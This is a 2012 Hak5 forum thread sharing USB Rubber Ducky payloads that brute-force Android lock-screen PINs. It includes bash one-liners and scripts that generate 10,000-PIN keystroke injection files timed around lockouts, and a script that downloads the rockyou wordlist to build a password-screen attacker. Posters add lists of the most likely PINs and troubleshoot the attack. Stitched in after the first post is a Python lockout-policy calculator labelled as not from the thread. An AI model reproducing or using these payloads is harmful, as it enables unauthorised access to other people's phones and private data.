[Payload] Android Brute Force 4-digit pin


30 replies to this topic

#1 Darren Kitchen

    Hak5 Junkie

  • Root Admin
  • 3,571 posts
  • Gender:Male
  • Location:San Francisco, CA

Posted 06 December 2012 - 06:31 PM

I'll be demoing this on next week's Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.


I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.

With a 4-digit PIN and the default of 5 tries followed by a 30-second timeout, you're looking at a best-case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.

Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5-digit, but that would take 166 hours. 10-digit would take 1902.2 years. ;-)

echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt

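An added example (not code from the thread or from Hak5) that puts the arithmetic above into a small lockout-policy model, and goes one step further than the post: it compares the 5-tries-then-30-second timeout Darren measured against the two mitigations posters in this thread expected to see, an escalating timeout and a wipe after a fixed number of failures. Parameter names, the 3600 s escalation cap and the wipe threshold of 100 are assumptions for illustration, not Android's actual values.

```python
"""Lockout-policy calculator: an added example, not code from the thread.

Time to exhaust a PIN keyspace under the policy the thread observed (5 tries,
then a 30 s timeout) versus two mitigations the thread expected but did not
see: a doubling timeout and a wipe after N failures. Names are hypothetical.
"""
from dataclasses import dataclass


@dataclass
class LockoutPolicy:
    tries_per_lockout: int               # failed attempts allowed per window
    lockout_seconds: float               # timeout after each full window
    per_try_seconds: float = 0.0         # typing time per PIN (0 = thread's arithmetic)
    escalate: bool = False               # double the timeout after every window
    max_lockout_seconds: float = 3600.0  # cap for an escalating timeout (assumed)
    wipe_after: int = 0                  # >0: erase the device after N failures


def reachable_guesses(keyspace: int, policy: LockoutPolicy) -> int:
    """Distinct PINs an attacker can try before a wipe (all of them if none)."""
    if policy.wipe_after <= 0:
        return keyspace
    return min(keyspace, policy.wipe_after)


def worst_case_seconds(keyspace: int, policy: LockoutPolicy) -> float:
    """Seconds to try every reachable PIN: typing time plus accumulated timeouts."""
    guesses = reachable_guesses(keyspace, policy)
    total = guesses * policy.per_try_seconds
    lockout = policy.lockout_seconds
    for _ in range(guesses // policy.tries_per_lockout):
        total += lockout
        if policy.escalate:
            lockout = min(lockout * 2, policy.max_lockout_seconds)
    return float(total)


def hours(seconds: float) -> float:
    return round(seconds / 3600, 1)


if __name__ == "__main__":
    stock = LockoutPolicy(tries_per_lockout=5, lockout_seconds=30)
    print("4-digit, stock policy:", hours(worst_case_seconds(10**4, stock)), "h")
    print("5-digit, stock policy:", hours(worst_case_seconds(10**5, stock)), "h")
    doubling = LockoutPolicy(5, 30, escalate=True)
    print("4-digit, doubling timeout:", hours(worst_case_seconds(10**4, doubling)), "h")
    wipe = LockoutPolicy(5, 30, wipe_after=100)
    print(f"4-digit, wipe after 100: {reachable_guesses(10**4, wipe) / 10**4:.0%} of keyspace testable")
```

The stock policy reproduces the post's 16.6 hours for 4 digits and 166 hours for 5; a doubling timeout capped at an hour pushes the same 4-digit run to about 83 days, and a wipe after 100 failures leaves only 1% of the keyspace testable at all.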

#2 Pwnd2Pwnr

    Hak5 Ninja

  • Active Members
  • 544 posts
  • Gender:Male
  • Location:Michigan
  • Interests:Arduino, Tech, Internet Policy, Development, Learning.

Posted 06 December 2012 - 06:36 PM

Darren Kitchen... once again... kicks ass and is like, "Whatevs".

Keep on rockin @Darren!

#3 Mr-Protocol

    Hak.5 Packet Ninja

  • Administrators
  • 2,922 posts
  • Gender:Male

Posted 06 December 2012 - 06:36 PM

I sent you a message elsewhere, but figured it would fit here as well.

Does this require ADB to be enabled?

Mr-Protocol @ irc.hak5.org #hak5
Mr-Protocol @ chat.freenode.org #hak5
I'm just watching a bad dream I never wake up from. -Spike Spiegel

https://www.DerbyCon.com/
MK4 Firmware MK4 Flashing
MK4 Clean Flash Guide

WiFi Pineapple Wiki

#4 Darren Kitchen

    Hak5 Junkie

  • Root Admin
  • 3,571 posts
  • Gender:Male
  • Location:San Francisco, CA

Posted 06 December 2012 - 08:38 PM

No, this doesn't require anything special on the Android side. All of these Android payloads have been tested on a stock Galaxy Nexus running the latest 4.2.1 firmware. I have tested many other devices and they have all worked well with the ducky. It seems Android loves HID as much as any other computer.

For that matter, iPhone should be the same - just requires the right 30-pin to USB adapter.

#5 Mr-Protocol

    Hak.5 Packet Ninja

  • Administrators
  • 2,922 posts
  • Gender:Male

Posted 06 December 2012 - 11:45 PM

No, this doesn't require anything special on the Android side. All of these Android payloads have been tested on a stock Galaxy Nexus running the latest 4.2.1 firmware. I have tested many other devices and they have all worked well with the ducky. It seems Android loves HID as much as any other computer.

For that matter, iPhone should be the same - just requires the right 30-pin to USB adapter.

Good to know, can't wait for your final version. Need to pick myself up a new and improved ducky (currently only have the dev Teensy; I was one of the lucky ones) next week when I get paid... along with other HakShop goodies :D.


#6 silver-moonshine

    Hak5 Fan +

  • Active Members
  • 35 posts
  • Gender:Male
  • Location:Manchester / 127.0.0.1
  • Interests:security flaws

Posted 07 December 2012 - 04:43 AM

Would this not also be effective on the new Windows 8, where people have the option to change their sign-in password to a PIN? :)

I Error, Therefore I Am.


#7 shoeless89

    Hak5 Fan

  • Active Members
  • 17 posts

Posted 08 December 2012 - 08:49 PM

I don't have my SD card reader with me to update my payloads for my ducky right now but can't wait to give it a shot!

#8 overwraith

    Hak5 Zombie

  • Active Members
  • 153 posts
  • Gender:Male

Posted 09 December 2012 - 03:40 PM

I am running CYGWIN and am having some problems with the script. Can anyone see what is happening with the script? Here is my command line.

C:\Users\UserName\Desktop>echo DELAY 5000 > android_brute-force_0000-9999.txt; ec
ho {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$
/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTE
R\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
C:\Users\UserName\Desktop>dir android*
Volume in drive C has no label.
Volume Serial Number is 2499-C7D7
Directory of C:\Users\UserName\Desktop
07/07/2012 01:03 AM 165 Android Paths.txt
08/30/2012 08:00 PM 50 Android SDK Path.txt
12/09/2012 02:26 PM 63 android_brute-force_0000-9999.txt
3 File(s) 278 bytes
0 Dir(s) 831,818,436,608 bytes free
C:\Users\UserName\Desktop>type android_brute-force_0000-9999.txt
DELAY 5000 ; echo {0000..9999}
STRING
DELAY 1000
ENTER
ENTER
C:\Users\UserName\Desktop>

Edited by overwraith, 09 December 2012 - 03:41 PM.


#9 shoeless89

    Hak5 Fan

  • Active Members
  • 17 posts

Posted 10 December 2012 - 10:01 PM

So when I plug the Rubber Ducky into my phone it doesn't do anything at all. The light doesn't light up or anything. But when I plug it into my computer I see the inject.bin file and the LEDs on the duck light up. Any ideas?

#10 Xcellerator

    Hak5 Fan ++

  • Active Members
  • 104 posts
  • Gender:Male

Posted 12 December 2012 - 11:17 AM

Are you sure that your phone supports a USB keyboard?

#11 midnitesnake

    Hak5 Pirate

  • Ducky Moderators
  • 441 posts
  • Gender:Male
  • Location:Earth
  • Interests:Ducky, Pineapple

Posted 12 December 2012 - 11:45 AM

To adapt Darren's simple script to generate android.txt on OS X, you need MacPorts installed and you need to install gsed (GNU sed), as GNU sed is slightly different from OS X's default BSD sed.

port install gsed

then:

echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | gsed '0~5 s/$/\nWAIT/g' | gsed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | gsed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt

Not sure what's going wrong with Cygwin?

#12 keb0x80

    Newbie

  • Members
  • 1 posts

Posted 12 December 2012 - 06:36 PM

I created a script to generate pretty much the same output using only bash loops/conditions.

#!/bin/bash
count=0
echo "DELAY 5000"
for pin in {0000..9999}
do
  count=$((count+1))
  echo "STRING $pin"
  # After every other pin, do this
  if [ $((count % 2)) -eq 0 ]; then
    echo "DELAY 1000"
    echo "ENTER"
    echo "ENTER"
  fi
  # After 5 pins, do this
  if [ $((count % 5)) -eq 0 ]; then
    for (( delay=0; delay<4; delay++ ))
    do
      echo "DELAY 5000"
      echo "ENTER"
    done
  fi
done


#13 shoeless89

    Hak5 Fan

  • Active Members
  • 17 posts

Posted 12 December 2012 - 10:43 PM

Are you sure that your phone supports a USB keyboard?


No I am not ;/

#14 Totu

    Newbie

  • Members
  • 1 posts

Posted 13 December 2012 - 01:30 AM

You probably could get a huge performance boost out of this method if you tweaked your PIN list a little.
Most common PINs would be any combinations with all the same numbers like 0000, 1111, 2222, 3333, etc. So you should probably try those first, then things like 1234, 1212, 4321, 6969. Because people like patterns, and people are lazy and don't want to remember more than two numbers.

Just my two cents.

#15 Kag

    Newbie

  • Members
  • 1 posts

Posted 13 December 2012 - 08:30 AM

It is kind of odd they didn't lock down the device after a certain number of tries, as pattern lock does that after 20 tries.
And once it gets locked down you'll need your Gmail password to unlock. (Which also sort of fails as well, because a reboot resets the counter.)

Edited by Kag, 13 December 2012 - 08:48 AM.


#16 iamnoxtras

    Newbie

  • Members
  • 1 posts

Posted 13 December 2012 - 09:25 AM

Hello everybody,
I must say that I am surprised that no one (only Totu) suggested using a handcrafted dictionary. I mean, you all probably read the article on CC PIN security. I think if you try to brute-force your way into a device with a PIN you should really use that list, instead of a generated one.
Here is the study:
http://www.datagenet...september32012/

and here are the first 10 pins I would try:
1234
1111
0000
1212
7777
1004
2000
4444
2222
6969

1 in 4 chance of hacking the device in under a minute!
What do you say?

Edited by iamnoxtras, 13 December 2012 - 09:35 AM.


#17 Pwnd2Pwnr

    Hak5 Ninja

  • Active Members
  • 544 posts
  • Gender:Male
  • Location:Michigan
  • Interests:Arduino, Tech, Internet Policy, Development, Learning.

Posted 13 December 2012 - 02:56 PM

My password is....

1

2

4

4

5

The same one on my luggage...

#18 overwraith

    Hak5 Zombie

  • Active Members
  • 153 posts
  • Gender:Male

Posted 13 December 2012 - 09:37 PM

I figured out what the problem was... I should have figured that the Linux foo would not work on the Windows command line even if I did put the Cygwin bin directory in my path variable. You have to use the Cygwin prompt provided with their software.

#19 CaptainHooligan

    Hackling

  • Active Members
  • 12 posts

Posted 14 December 2012 - 03:29 PM

Another good thing to do would be to download the rockyou password list from SkullSecurity. Take the top 5000 out of it, as it is already sorted from most frequently used to least. If a device is encrypted this will save you tons of time, as there is no 5-passwords-then-wait limiter.

** Edit **
Here is a script that will grab rockyou.txt and create a payload for you in linux. Right now it does wait 30 seconds after every 5 passwords. I'm adding an option to not wait 30 seconds as if attacking the encryption logon screen.

#!/bin/bash
clear
echo -e "========================================================"
echo -e " This script downloads the rockyou password list"
echo -e " then takes the top 5000 passwords and generates"
echo -e " an Android brute forcer."
echo -e "========================================================"
echo -e " You need to have duckencode.jar installed as well"
echo -e " as bzip2 and wget."
echo -e "========================================================"
echo -e " This script is licensed under the GPLv3 and is"
echo -e " currently maintained by James Luther (CaptainHooligan)"
echo -e "========================================================"
echo ""
echo ""
WHOAMI=`id | sed -e 's/(.*//'`
if [ "$WHOAMI" != "uid=0" ] ; then
	 echo "Sorry, you need super user access to run this script."
	 exit 1
fi
echo -e "Verifying prerequisites are installed ... "
echo ""
# Keep only the first match: find can print several paths, and $duckdir is passed to java below.
duckdir=`find / -name duckencode.jar 2>/dev/null | head -n 1`
if [ -z "$duckdir" ] ; then
echo "Duckencode.jar not found on system. Please verify you have this installed."
exit 1
else
echo "Duckencode.jar prerequisite met."
fi
# command -v looks the tools up on PATH directly, so nothing has to be appended to PATH.
if [ -z "`command -v bzip2`" ] ; then
echo "Bzip2 not found on system. Please verify you have this installed."
exit 1
else
echo "Bzip2 prerequisite met."
fi
if [ -z "`command -v wget`" ] ; then
echo "Wget not found on system. Please verify you have this installed."
exit 1
else
echo "Wget prerequisite met."
fi
echo ""
echo ""
#echo -e "Which do you want to attack?"
#echo -e " 1. Encryption Screen"
#echo -e " 2. Password Screen"
#read answer
#case answer
# 1)
echo -e "Verify connection to internet and press [Enter]."
read
echo ""
echo ""
echo -e "Downloading rockyou password list. This can take some time ..."
echo ""
echo ""
wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2
bunzip2 rockyou.txt.bz2
echo ""
echo ""
echo -e "Creating rock-android.txt file ... "
echo ""
echo ""
echo DELAY 5000 > rock-android.txt; head -5000 rockyou.txt | sed -e 's/^/STRING /' | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> rock-android.txt
echo -e "rock-android.txt created!"
ls -lart rock-android.txt
echo ""
echo ""
echo -e "Creating inject.bin file ... "
java -jar "$duckdir" -i rock-android.txt
echo ""
echo ""
echo -e "Inject.bin created. Copy this over to your sdcard and enjoy!"
ls -lart inject.bin

Edited by CaptainHooligan, 14 December 2012 - 05:27 PM.


#20 barry99705

    iTard wrangler

  • Active Members
  • 1,055 posts

Posted 26 December 2012 - 03:09 PM

My pin is actually a really old phone number, none of mine, but one I had memorized. It's also not one of the multiple same number combos. I'd think most people would go this route, the lazy ones would probably use their own number...



